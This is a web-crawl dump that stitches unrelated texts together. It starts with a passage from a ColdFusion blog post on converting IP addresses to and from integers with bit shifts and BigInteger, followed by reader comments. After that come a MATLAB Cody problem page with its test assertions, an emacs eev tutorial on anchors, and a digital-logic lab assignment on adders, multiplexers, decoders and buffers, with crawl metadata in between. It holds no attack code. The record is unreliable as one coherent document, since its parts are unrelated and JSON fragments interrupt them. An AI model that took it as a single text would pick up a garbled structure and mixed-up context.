1181772947\n\nTo go back the other way - convert an Integer to an IP Address - we basically do the above, but in reverse. Rather than shifting left, we'll shift right; rather than adding, we'll bitAnd().\n\n``````<!--- Set the IP numeric equivalent. --->\n<cfset ipNumber = 1181772947 />\n\n<!---\nCreate an array to hold the parts of the IP address as we\nparse them out of the interger equivalent.\n--->\n<cfset ipParts = [] />\n\n<!---\nNow, let's keep shifting the IP integer right by 8 bits\n(the number of bits required for 255) until we have nothing\nleft to shift over.\n--->\n<cfloop condition=\"val( ipNumber )\">\n\n<!---\nAt this point, the next value we want to get is in the\nlast 8 bits of the number. To get at it, we can bitAnd()\nwith 255, which is the bit configuration, 11111111.\n\nNOTE: Since we are getting the right-most IP units first,\nwe are going to PREpend the values to our IP array.\n--->\n<cfset arrayPrepend(\nipParts,\nbitAnd( ipNumber, 255 )\n) />\n\n<!---\nNow that we have gotten the right-most bits, let's shift\nthe number right by 8 bits. This will put the next IP\nunit we want to get in the last 8 bits of the number.\n--->\n<cfset ipNumber = bitSHRN( ipNumber, 8 ) />\n\n</cfloop>\n\n<!--- Output the parsed IP address. --->\nIP Address: #arrayToList( ipParts, \".\" )#<br />\n``````\n\nAs you can see, with each right-shift of the bits using ColdFusion's bitSHRN() function, the next octet becomes the right-most 8 bits of the running \"unTotal\". We then extract those right-most bits by bitAnd()'ing the value with 255. When we run the above code, we get the following output:\n\nAs you can see, we were able to convert the IP address to an integer and then back to an IP address.\n\nWhile this worked well, it really took ColdFusion to the limits of its integer capabilities. If we needed to left-shift just one or two more times, we would have required the creation of an integer too large for ColdFusion's (and Java's) basic data types. I don't know much of anything about the next generation of IP addresses - IPv6 - but I do know that it will require more bits than an Integer value will comfortably work with. As such, I thought it would be a fun experiment to perform this task again, this time with a few additional octets.\n\nBecause Java's int data type only allows for 32 bits, it means that ColdFusion, which is built on top of Java, also only allows for 32-bit integers. When dealing with extra octets, and subsequently extra bits, we'll need to go beyond basic data types. Luckily, Java provides for such cases with classes like BigInteger. In the following demos, all bit manipulation and addition will need to be done through BigInteger instances.\n\nFirst, let's convert our IP address to an integer:\n\n``````<!--- Set the LARGER address. --->\n\n<!--- Break the IP address into numeric units. --->\n<cfset ipParts = listToArray( ipAddress, \".\" ) />\n\n<!---\nCreate a running total for our numeric IP equivalent.\nBecause our running total must hold the VERY large value,\nwe need to use Java's BigInteger.\n--->\n<cfset ipNumber = createObject( \"java\", \"java.math.BigInteger\" )\n.init( javaCast( \"string\", \"0\" ) )\n/>\n\n<!---\nLoop over the parts of the array. For each part, we are going\nto let the 8 bits be continually shifted over to add exclusive\nbits to the running total.\n--->\n<cfloop\nindex=\"offset\"\nfrom=\"1\"\nto=\"#arrayLen( ipParts )#\"\nstep=\"1\">\n\n<!---\nSince each IP unit is a max of 255, we need to shift it\nover (bit-wise) for multiples of 8. However, since the\namount we are shifting by can be very large, we need to\ncreate an intermediary BigInteger to hold this value.\n--->\n<cfset ipShift = createObject( \"java\", \"java.math.BigInteger\" )\n.init( javaCast( \"string\", ipParts[ offset ] ) )\n/>\n\n<!---\nShift the current value by multiples of 8 bits and add\nthe shifted value to the running total.\n--->\nipShift.shiftLeft(\njavaCast(\n\"int\",\n((arrayLen( ipParts ) - offset) * 8)\n)\n)\n) />\n\n</cfloop>\n\n<!--- Output the resultant IP number equivalent. --->\nIP Number: #ipNumber.toString()#\n``````\n\nAs you can see this time, our IP address has two more octets: \"123.123\". Because of this, we need to play with more bits than a standard int value can hold. Java's BigInteger class allows for very large integer manipulation with a fairly easy API. Notice that when we create a BigInteger class instance, we have to initialize it with a string value rather than a numeric value; this is due to the fact that the initial value might be larger than an int data type can hold. Likewise, when we retreive the value from a BigInteger instance, we have to retreive it as a string. When we run the above code, we get the following output:\n\nIP Number: 77448671886203\n\nGoing back the other way - Integer to IP Address - we need to do the above in reverse:\n\n``````<!---\nSet the IP numeric equivalent. Because this is such a huge\nnumber, we are going to have to use Java's BigInteger to\nmodel and mutate it.\n--->\n<cfset ipNumber = createObject( \"java\", \"java.math.BigInteger\" )\n.init( javaCast( \"string\", \"77448671886203\" ) )\n/>\n\n<!---\nSince big integers require other big intergers for\nmathematical forumuls, let's create one to represent 255. This\nwill be ANDed with the IP number as we parse it.\n--->\n<cfset bigInt255 = createObject( \"java\", \"java.math.BigInteger\" )\n.init( javaCast( \"string\", \"255\" ) )\n/>\n\n<!---\nCreate an array to hold the parts of the IP address as we\nparse them out of the interger equivalent.\n--->\n<cfset ipParts = [] />\n\n<!---\nNow, let's keep shifting the IP integer right by 8 bits\n(the number of bits required for 255) until we have nothing\nleft to shift over.\n--->\n<cfloop condition=\"val( ipNumber.toString() )\">\n\n<!---\nAt this point, the next value we want to get is in the\nlast 8 bits of the number. To get at it, we can bitAnd()\nwith 255, which is the bit configuration, 11111111.\n--->\n<cfset arrayPrepend(\nipParts,\nipNumber.and( bigInt255 ).toString()\n) />\n\n<!---\nNow that we have gotten the right-most bits, let's shift\nthe number right by 8 bits. This will put the next IP\nunit we want to get in the last 8 bits of the number.\n--->\n<cfset ipNumber = ipNumber.shiftRight(\njavaCast( \"int\", 8 )\n) />\n\n</cfloop>\n\n<!--- Output the parsed IP address. --->\nIP Address: #arrayToList( ipParts, \".\" )#<br />\n``````\n\nTo get the right-most 8 bits of the BigInteger value, we need to bit-AND it with 255. While 255 could easily fit into an int data type, since all math performed with a BigInteger needs to be done with BigIntegers, we needed to create a BigInteger representation of 255. Other than this new data type, the overall algorithm is practically unchanged.\n\nNow that I've had to do this and explain it, I'm starting to feel much more comfortable with bit-wise manipulation. I know that there are easier ways to perform IP-to-Integer conversions (such as multiplying by powers of 255); but, I think that doing it this way, with explicit bit-shifting, really gets you to think about the underlying mechanics of what is taking place.", null, "Hi,\n\nThe problem with your first solution is that for any IP adresse in the upper half of the IPv4 pool (> 128.0.0.1) coldfusion will answer with a negative number, ex:\n\nIP Number: -1435472749\n\nColdfusion bit operations are working on 32 bits signed integer, while it's possible to build bigger integer (up to 40 bits) using standard multiply operation\n\nAs for IPv6, it a 128 bits integer, usually coded in the hexadecimal form, of height 16bits blocks:\n1fff:0000:0a88:85a3:0000:0000:ac1f:8001\n\nIt's easier to convert to decimal form: just remove the ':' and convert from hex to decimal (well, with a system supporting 128 integers obviously).", null, "Thumbs up for creativity ;)\nAlways did this in more conventional way, with reg. expressions and listGetAt.", null, "@Silmaril,\n\nI am not sure what you are saying about the negative number. Remember, we don't really *care* what the integer is - it's just a collection of bits. From an INT standpoint, the left-most bit might be for signing; but, from a bit-mask standpoint, it's just another bit that can be shifted.\n\nI tried plugging in 170 as the first octet and got the following results:\n\nIP Number: -1435472749\n\nThen, going from -1435472749 back to an IP address, I got the following:\n\nAs you can see, the bit-wise manipulation was not affected by the use of the signed bit.\n\nAs for the IPv6, I tried looking them up last night, but I didn't read too much on them.", null, "@Ben\n\nYes indeed it's reversible, but the main use of decimal based IP addresse is for comparaison for systems that cannot directly compare IP addresses, and while 128.0.0.1 is between 127.0.0.1 and 129.0.0.1, it will be harder to verify using a signed integer", null, "@Silmaril,\n\nAhh, I see what you're saying. Sorry - I'm not too familiar with the database concepts behind converting IP to integers; I was just using this as an experiment in bit manipulation. I'll have to learn up on that a bit - thanks.", null, "That should be: (such as multiplying by powers of 256)", null, "@Gary,\n\nAh good catch - I wasn't sure about that. I'll have to do some learning on that.", null, "Hi Ben. My programming knowledge a very low but i would try to understand why this is better than a string. my questen is, is this only for better performance? is this only for coldfusion or else php, c++ and so on?", null, "@Carsten,\n\nBit-wise manipulation, and this general approach, should be available in just about any language. In this post, I used ColdFusion, but then, I dipped down into Java to use the BigInteger class. I would assume that C++ has something similar. As for PHP, it definitely has bit manipulation - whether or not it can handle HUGE integers, I don't know.\n\nI think the use of numbers is for performance and, @Silmaril mentioned, the numbers allow you to compare ranges of IP address (something that you cannot easily do with string representations).", null, "Just as a footnote, Ben, MySQL has two handy functions: INET_ATON() to convert in IP string to int, and INET_NTOA() to go the other way.\n\nSaving IPs as ints rather than varchars can significantly reduce the storage size of a table with a lot of rows. Access logging tables where you're capturing visitor IPs are a prime candidate.", null, "@Julian,\n\nThat is awesome! Thanks for letting me know about that.", null, "Hi Ben, thank you for your article which really helped me a lot. I implemented a similar solution using T-SQL so, for reference, and if you don't mind, I'll add a link to it here. It may be useful to people in the future.\n\nhttps://gist.github.com/simonbingham/5000258", null, "@Simon,\n\nVery cool :)", null, "Here's a much easier and shorter way (one line) to convert an IPv4 address to a numeric value...\n\nIf you want to convert this (assume it's store in variable \"ip\"): \"12.48.40.0\"\n\nJust do this:\n\n(ListGetAt(ip, 4, \".\") + ListGetAt(ip, 3, \".\") * 256 + ListGetAt(ip, 2, \".\") * 256 * 256 + ListGetAt(ip, 1, \".\") * 256 * 256 * 256)", null, "" ]
[ null, "https://bennadel-cdn.com/resources/uploads/ip_to_number_bit_wise_conversion.gif", null, "https://www.gravatar.com/avatar/00382f2043769476dd53275ae700e08d", null, "https://www.gravatar.com/avatar/588213c960f7fba8cb6399924be155b8", null, "https://www.gravatar.com/avatar/f9bbc701ca6770ef482cc1e172344e25", null, "https://www.gravatar.com/avatar/00382f2043769476dd53275ae700e08d", null, "https://www.gravatar.com/avatar/f9bbc701ca6770ef482cc1e172344e25", null, "https://www.gravatar.com/avatar/de3fa229388a4f519cf0b71fc007b2e7", null, "https://www.gravatar.com/avatar/f9bbc701ca6770ef482cc1e172344e25", null, "https://www.gravatar.com/avatar/e197d92af94e05fc3ddcd3f4e04bdaa3", null, "https://www.gravatar.com/avatar/f9bbc701ca6770ef482cc1e172344e25", null, "https://www.gravatar.com/avatar/11f640042d172c1601f9a8d3341121a8", null, "https://www.gravatar.com/avatar/f9bbc701ca6770ef482cc1e172344e25", null, "https://www.gravatar.com/avatar/9456f0397f4d400301961c60b3fc24c4", null, "https://www.gravatar.com/avatar/f9bbc701ca6770ef482cc1e172344e25", null, "https://www.gravatar.com/avatar/d32e9545325d2671bb11e3d6a2e28f60", null, "https://www.gravatar.com/avatar/d504fefd75f32e502178ad74a7983ac0", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.88145834,"math_prob":0.90542144,"size":14506,"snap":"2020-45-2020-50","text_gpt3_token_len":3718,"char_repetition_ratio":0.12929252,"word_repetition_ratio":0.21975407,"special_character_ratio":0.28277954,"punctuation_ratio":0.14564103,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9779207,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32],"im_url_duplicate_count":[null,2,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-10-28T09:41:46Z\",\"WARC-Record-ID\":\"<urn:uuid:e8dbab5f-9ea5-4106-a73e-f013a6fe4e4f>\",\"Content-Length\":\"41808\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:ea38e818-241e-49b9-a214-e3bbca088153>\",\"WARC-Concurrent-To\":\"<urn:uuid:22dde643-088c-4fd9-94bd-8753872a4031>\",\"WARC-IP-Address\":\"184.175.83.43\",\"WARC-Target-URI\":\"https://www.bennadel.com/blog/1830-converting-ip-addresses-to-and-from-integer-values-with-coldfusion.htm\",\"WARC-Payload-Digest\":\"sha1:V35MPUCISHQKUDS3ZIR26DU6YFM2R5FO\",\"WARC-Block-Digest\":\"sha1:7XNREOWST2XJAOTQSYLLUYVW242HV4VB\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-45/CC-MAIN-2020-45_segments_1603107897022.61_warc_CC-MAIN-20201028073614-20201028103614-00696.warc.gz\"}"}
https://it.mathworks.com/matlabcentral/cody/problems/528-find-the-largest-value-in-the-3d-matrix/solutions/1169247
[ "Cody\n\n# Problem 528. Find the largest value in the 3D matrix\n\nSolution 1169247\n\nSubmitted on 24 Apr 2017 by Arief Anbiya\nThis solution is locked. To view this solution, you need to provide a solution of the same size or smaller.\n\n### Test Suite\n\nTest Status Code Input and Output\n1   Pass\nA = 1:9; A=reshape(A,[3 1 3]); y_correct = 9; assert(isequal(islargest(A),y_correct))\n\n2   Pass\nA = 9:17; A=reshape(A,[3 1 3]); y_correct = 17; assert(isequal(islargest(A),y_correct))\n\n3   Pass\nA = []; A(:,:,1) = magic(5); A(:,:,1) = eye(5); A(:,:,1) = 40*ones(5); y_correct = 40; assert(isequal(islargest(A),y_correct))" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5457467,"math_prob":0.9963597,"size":504,"snap":"2019-35-2019-39","text_gpt3_token_len":180,"char_repetition_ratio":0.15,"word_repetition_ratio":0.029411765,"special_character_ratio":0.42857143,"punctuation_ratio":0.26495728,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99102664,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-08-23T05:45:19Z\",\"WARC-Record-ID\":\"<urn:uuid:99a5c8a9-6edc-4e4a-83f0-77c865ec84b1>\",\"Content-Length\":\"72714\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:71fdce1e-a862-4aaa-9ac4-5fc99e278ba7>\",\"WARC-Concurrent-To\":\"<urn:uuid:5b629ecb-24ac-4e6a-ad70-dbd45e69a935>\",\"WARC-IP-Address\":\"104.117.39.124\",\"WARC-Target-URI\":\"https://it.mathworks.com/matlabcentral/cody/problems/528-find-the-largest-value-in-the-3d-matrix/solutions/1169247\",\"WARC-Payload-Digest\":\"sha1:FDVSODWCHL2G7TVARNMCGVP4G7EF65F5\",\"WARC-Block-Digest\":\"sha1:FPVS7SL4TBDUXSFN75FZJ22GWI3GVTBD\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-35/CC-MAIN-2019-35_segments_1566027317847.79_warc_CC-MAIN-20190823041746-20190823063746-00041.warc.gz\"}"}
http://angg.twu.net/eev-intros/find-anchors-intro.html
[ "```(Re)generate: (find-anchors-intro)\nSource code: (find-eev \"eev-intro.el\" \"find-anchors-intro\")\nMore intros: (find-eev-quick-intro)\n(find-refining-intro)\nThis buffer is _temporary_ and _editable_.\nIt is meant as both a tutorial and a sandbox.\n\nNotes: this is an advanced tutorial!\nAnd it is very incomplete at the moment!\n\n1. Introduction\nThese sections of the main tutorial explain what anchors are, and\nexplain two simple ways of creating index/section anchor pairs:\n\n(find-eev-quick-intro \"8. Anchors\")\n(find-eev-quick-intro \"8.1. Introduction: `to'\")\n(find-eev-quick-intro \"8.3. Creating index/section anchor pairs\")\n(find-eev-quick-intro \"8.3. Creating index/section anchor pairs\" \"`M-A'\")\n(find-eev-quick-intro \"8.4. Creating e-script blocks\")\n(find-eev-quick-intro \"8.4. Creating e-script blocks\" \"`M-B'\")\n\nand these other sections explain briefly how hyperlinks to\nanchors in other files work,\n\n(find-eev-quick-intro \"8.5. Hyperlinks to anchors in other files\")\n(find-eev-quick-intro \"9.2. Extra arguments to `code-c-d'\")\n(find-eev-quick-intro \"9.2. Extra arguments to `code-c-d'\" \":anchor)\")\n(find-eev-quick-intro \"9.2. Extra arguments to `code-c-d'\" \"makes (find-eev\")\n\nbut they stop right before explaining how to use them in a\npractical way, i.e., with few keystrokes. This intro is about\nthis.\n\n2. Shrinking\nWe saw in\n\n(find-eev-quick-intro \"9.2. Extra arguments to `code-c-d'\" \"makes (find-eev\")\n\nthat these two hyperlinks are equivalent:\n\nThe first one searches for a string in \"eev-blinks.el\" in the\nnormal way; the second one treats the \"find-wottb\" as a tag,\nwraps it in `«»'s, and then searches for the anchor\n\nWe will refer to the operation that converts the hyperlink\n\nto\n\nas _shrinking_ the hyperlink. Eev has a key sequence that does\nthat, and for simplicity its behavor is just this: it looks at\nfirst element of the sexp at eol (the \"head\" of the sexp), and\nif it is a symbol that ends with \"file\" then rewrite the sexp\nreplacing the head symbol by it minus its suffix \"file\". That\nkey sequence is `M-h M--' (`ee-shrink-hyperlink-at-eol'), and its\nsource code is here:\n\nTry it on the two lines below:\n\n3. The preceding tag\nThe key sequence `M-h M-w' copies the current line to the kill\nring, highlights it for a fraction of a second, and shows the\nmessage\n\n\"Copied the current line to the kill ring - use C-y to paste\"\n\nin the echo area. Here are links to its source code and to a\nsection of a tutorial that mentions it:\n\n(find-eev \"eev-edit.el\" \"ee-copy-this-line-to-kill-ring\")\n(find-refining-intro \"3. Three buffers\" \"M-h M-w\")\n\nWhen we run `M-h M-w' with a numeric argument - for example, as\n`M-1 M-h M-w' - it highlights and copies to the kill ring the\n\"preceding tag\" instead of the current line; the \"preceding\ntag\" is the string between `«»'s in the anchor closest to the\npoint if we search backwards. As an exercise, type `M-1 M-h M-w'\nat some point below, and then use `M-h M-y' (`ee-yank-pos-spec')\nanchors.\n\n«first-anchor»\n«second-anchor»\n«third-anchor»\n\n(find-anchors-intro)\n\n[TO DO: write the other sections!]\n\n```" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7713388,"math_prob":0.47788537,"size":3463,"snap":"2022-27-2022-33","text_gpt3_token_len":1038,"char_repetition_ratio":0.17432784,"word_repetition_ratio":0.035343036,"special_character_ratio":0.2717297,"punctuation_ratio":0.11080332,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.971059,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-06-29T02:56:23Z\",\"WARC-Record-ID\":\"<urn:uuid:b5c0d25b-32c7-4ced-8fb3-6ec615184d51>\",\"Content-Length\":\"7328\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:713db15d-3b14-4385-8067-20af65a65f05>\",\"WARC-Concurrent-To\":\"<urn:uuid:8ef419d2-2c8f-4a7b-b465-9e1bb416322b>\",\"WARC-IP-Address\":\"192.129.162.2\",\"WARC-Target-URI\":\"http://angg.twu.net/eev-intros/find-anchors-intro.html\",\"WARC-Payload-Digest\":\"sha1:EFNB5EMHE5ZNTCBWLVFUKJB6Z5MOOKUS\",\"WARC-Block-Digest\":\"sha1:IIGD2ZP3XXAIIFSPJTFX6RY2AWFWCALG\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103620968.33_warc_CC-MAIN-20220629024217-20220629054217-00253.warc.gz\"}"}
https://www.aplusanswers.com/4-bit-full-adder-multiplexer-decoder-buffer/
[ "4-Bit Full Adder, Multiplexer, Decoder & Buffer\n\n4-Bit Full Adder, Multiplexer, Decoder & Buffer\n\nPrerequisites: Before beginning this laboratory experiment you must be able to:\n• Use Logisim.\n• Use Karnaugh maps.\n• Have completed Simulation Lab 1: Half Adder, Increment & Two’s Complement Circuit.\nEquipment: Personal computer and Logisim.\nObjectives: In this laboratory exercise, you will build and debug combinational logic subcircuits that perform arithmetic operations and data routing using Logisim.\nOutcomes: When you have completed the tasks in this experiment you will be able to design, build, test, debug, and imbed in a subcircuit, the following components:\n• A 2-to-1 multiplexer.\n• A 4-bit, 2-to-1 multiplexer.\n• A 1-to-2 decoder.\n• A 2-to-4 decoder.\n• A 4-to-16 decoder.\n• A 4-bit buffer.\nIntroduction\nIn Simulation Lab 1, you developed the increment circuit (which you will use in the program-counter portion of the microprocessor design) and the two’s-complement\n\ncircuit (which you will use as part of the arithmetic and logic unit [ALU] of the microprocessor design.) In this laboratory exercise you will continue constructing\n\nmodules that will eventually be used in assembling the microprocessor. Our concern in this laboratory exercise is with circuits that can perform binary addition (the\n\nadder) and with circuits that control the flow of data through our system (the multiplexer and decoder). You will eventually use the data-flow-control circuits you\n\ncreate in this lab exercise (a 4-bit 2-to-1 multiplexer, and a 4-to-16 decoder) to make the microprocessor self-capable of routing data to appropriate locations. The\n\nbinary-addition circuitry you will create (which is a 4-bit full adder) will contribute another piece to the ALU. You will also build a 4-bit three-state buffer to\n\ncontrol different signal sources sharing a common communication bus. Each circuit you build will be modularized by imbedding it in a subcircuit and these modules will\n\nbe used in subsequent labs to create more complex circuits. Using modules to create more complex modules is a powerful strategy that we will use throughout these\n\nsimulation laboratory exercises.\nAs we progress through these laboratory exercises, you will notice that the burden of circuit design will be shifted to you. Instead of giving you a circuit schematic\n\nand asking you to build, debug and modularize it, we will slowly begin to ask you to do more of the design work yourself. Any design work you are asked to do will be\n\nwell within your capabilities and will be supported by the lecture material, and your innate ability to recognize patterns.\nUsing the full-adder truth table, Table 1, write down the canonical SOP expressions for the Cout and SUM functions of a full adder. Using these canonical SOP\n\nexpressions, build, test and debug the circuits that realize the Cout and SUM functions using only NOR/NOR logic with Logisim. (Remember: you will need to design two\n\ncircuits: one for the SUM function and one for the Cout function. Both functions should share the same A, B and Cin inputs. No need for Karnaugh maps. Write down the\n\ncanonical POS expressions, then transform to use NOR/NOR logic. Hint: deMorgan’s law will help. When you need the complement of a variable, you may use inverters,\n\ni.e., NOT gates,\n2\nrather than using NOR gates connected as inverters.) Record the results of your validation tests in the form of a truth table in your lab template.\n\nBuild, debug and test a 1-bit full-adder circuit. Use NOR/NOR logic to implement your minimal POS form for the Cout function (use Figure 1 only as a guide since you\n\nneed to implement Cout using NOR/NOR logic) and construct the SUM function using a 3-input XOR gate. When you use XOR gate in Logisim, specify its “Multiple-Input\n\nBehavior” as “When an odd number are on”. Test your circuit. Record the results of these tests (in the form of a truth table) in your lab template.\nFigure 1. SOP implementation of a 1-bit full adder\nImbed your 1-bit full adder in a subcircuit (see Figure 2), label the subcircuit FA_1.\n3\nFigure 2. Subcircuit symbol for a 1-bit full adder\nUsing Figure 3 (2-bit full adder) as a guide, design a 4-bit full adder. The 4-bit full adder should accept two 4-bit numbers and a carry as input, and give one 4-bit\n\nsum and a 1-bit carry as output. Build, test and debug the 4-bit full adder. For naming inputs and outputs, see Figure 4 for reference. Test the circuit using a\n\nmulti-bit input pin and a hex digit display. Include the test results in the form of a truth table in your lab template. DO NOT test all input combinations. It is left\n\nto you to decide what constitutes a sufficient set of tests to make it likely that the 4-bit full-adder circuit is operating correctly. (One set of test inputs is not\n\nenough.) Justify in your lab template why successful completion of your tests proves beyond a reasonable doubt that your circuit is operating correctly. Once you are\n\nsatisfied that the circuit is working correctly, imbed the 4-bit adder in a subcircuit, label it “FA_4”, as shown in Figure 4.\n4\nFigure 4. Subcircuit symbol for a 4-bit full adder\nTask 2-4: Design, Build and Test a MUX Using NOR/NOR Logic\nNotation: We will use the following naming convention to represent a signal that is active when it is low, i.e., an active low signal: /~. Using this notation, the\n\nactive low signal Arith would be represented by /~Arith. Where a signal performs one operation when high (operation Y) and another operation when it is low (Z) we will\n\nlabel the signal Y/~Z. Using this notation, the complement of an active low signal is represented as: (/~Arith)’ .\nWhen we discuss the architecture of the microprocessor in later laboratory experiments, we will find that hardware is needed that allows the executing program to\n\nselect the route along which data flows. One component that we will need to perform this data routing function is the multiplexer, or MUX. A MUX is a device that can\n\nbe controlled to route one of its many input signals to its sole output. A truth table and symbol for the 1-bit 2-to-1 MUX you will build is shown in Figure 5. The\n\ncontrol/select input, ‘A/~B’, indicates that the output is identical to the A input when the select signal is high (1) and identical to the B input when the select\n\nsignal is low (0).\nFigure 5. Subcircuit symbol and truth table for a 1-bit 2-to-1 MUX\nUsing the Karnaugh Map methods you learned in lecture, design, build and test a NOR/NOR implementation of the 1-bit 2-to-1 MUX. You will want to base your design on\n\nthe minimal SOP form of the equation that defines the MUX output. (When you need the complement of a variable or a function, you may use inverters, i.e., NOT gates,\n\nrather than using NOR gates connected as inverters.) Test the circuit and record the results as a truth table in your lab template. Once you are convinced that the\n\ncircuit is working correctly, imbed it in a subcircuit, label it “MUX_1” as shown in Figure 5.\nTask 2-5: Build a 2-Input 4-Bit Multiplexer\nBecause our microprocessor operates on 4-bit numbers, it will be necessary to construct a 4-bit, 2-to-1 MUX. The 4-bit MUX should use a single control/select line to\n\nselect one of two 4-bit numbers and the selected 4-bit number should appear on the output of the MUX. A 2-bit 2-to-1 MUX is shown in Figure 6. Expand on this figure to\n\ndesign\n\nyour 4-bit MUX. Build and test the 4-bit MUX. Once you are satisfied that it is working correctly, imbed it in a subcircuit, and label the subcircuit “MUX_4” (Figure\n\n7).\nFigure 6. 2-bit 2-to-1 MUX\nFigure 7. Subcircuit symbol for a 4-bit 2-to-1 MUX\nTask 2-6: Build and Test a 1-to-2 Decoder Using NOR/NOR Logic\nThe other piece of hardware our microprocessor will need is a decoder, and it will be used to control access to memory. The truth table and subcircuit symbol for the\n\n1-bit 1-to-2 decoder you will build is shown in Figure 8. When the EN input is low, the decoder is disabled, so both Y0 and Y1 output zeroes; when the EN input is\n\nhigh, the decoder decodes the binary number A0 to a decimal number, and the Y output with subscript corresponding to that decimal number will output a one, with the\n\nrest of Y’s outputting zeroes.\nFigure 8. Subcircuit symbol and truth table for a 1-bit 1-to-2 decoder\nBuild, and test the 1-bit, 1-to-2 decoder using only NOR/NOR logic. You will want to base your design on the minimal POS form of the equations that define the decoder\n\noutputs Y0 and Y1. (When you need the complement\n\nof a variable or a function, you may use inverters, i.e., NOT gates, rather than using NOR gates connected as inverters.) Test the circuit and record the results as a\n\ntruth table in your lab template. Once you are convinced that the circuit is working correctly, imbed it in a subcircuit, label it “DECODER_1” as shown in Figure 8.\nTask 2-7: Build and Test a 2-to-4 Decoder Using NOR/NOR Logic\nThe microprocessor you will build will need a larger decoder than that constructed above. Let’s start by building a 2-to-4 decoder. A 2-to-4 decoder has the function\n\ndefinition table shown in Figure 9. Just like a 1-to-2 decoder, when the EN input is low, the decoder is disabled, so all Y’s output zeroes; when the EN input is high,\n\nthe decoder decodes the binary number (A1A0) to a decimal number, and the Y output with subscript corresponding to that decimal number will output a one, with the rest\n\nof Y’s outputting zeroes.\nFigure 9. Subcircuit symbol and function definition table for a 1-bit 2-to-4 decoder\nBuild, and test the 1-bit, 2-to-4 decoder using only NOR/NOR logic. (When you need the complement of a variable or a function, you may use inverters, i.e., NOT gates,\n\nrather than using NOR gates connected as inverters.) Imbed your circuit in a subcircuit labeled “DECODER_2” as shown in Figure 9.\nTask 2-8: Design, Build & Test a 4-to-16 Decoder Using 2-to-4 Decoders\nAn alternate scheme for building the 1-bit 2-to-4 decoder using primitive logic gates as in Task 2-7 is to build the decoder using the 1-bit 1-to-2 decoders built in\n\nTask 2-6. Justify to yourself that the circuit of Figure 10 will function as a 1-bit 2-to-4 decoder. Also prove to yourself that when the EN input line is inactive\n\n(i.e., 0), all output lines will be inactive.\nFigure 10. Schematic for a 2-to-4 decoder constructed from 1-to-2 decoders\nUsing the technique illustrated in Figure 10, design, build, and test a 1-bit 4-to-16 decoder using only the 1-bit 2-to-\n4 decoder subcircuits you constructed in Task 2-7. Imbed your circuit in a subcircuit labeled “DECODER_4” (see Figure 11 for the subcircuit symbol to use).\n\nFigure 11. Subcircuit symbol for a 1-bit 4-to-16 decoder\nTask 2-9: Build a 4-Bit Buffer\nA buffer is a circuit with a data and a control input. The control input controls whether the data input signal is allowed to propagate to buffer’s output. The buffer\n\ncircuit uses the three-state device described in lecture.\nA 1-bit three-state buffer in Logisim (under Gates-> Controlled Buffer) has a single active high enable as shown in Figure 12. When EN = 0, the output Y is in high\n\nimpedance state; when EN = 1, the output Y is the same as input A.\nFigure 12. 1-bit tri-state buffer in Logisim\nIn our microprocessor, we will need to have more than two sources share a common communication bus. If the outputs of many three-state buffers are wired together and\n\nall but one are in the high-impedance state, then the active buffer will control the value measured at the output; however, if the outputs do not ‘take turns’\n\nproperly, (i.e., if more than one of the three-state buffers is active) the potential exists for a data conflict. Therefore, it is necessary when using three-state\n\ndevices to be sure that all outputs but one are in the high-impedance state.\nIn our microprocessor, we will use buffer circuits to allow eight 4-bit memory locations to share a common communication bus. To allow these memory circuits to share a\n\ncommon 4-bit communication bus, we will need to use a 4-bit buffer circuit made of four three-state devices that share a common enable signal.\nFor our microprocessor, we will need a 4-bit buffer. In Logisim, you can insert a 4-bit buffer by clicking Gates->Controlled Buffer. Set Data Bits to 4.\n8\nFigure 13. 4-bit tri-state buffer in Logisim\nBuild and test the circuit in Figure 13. Mention briefly in your lab template how you tested your circuit and comment on why you believe that your tests are a reliable\n\nindicator that your circuit is operating correctly." ]
[ null ]
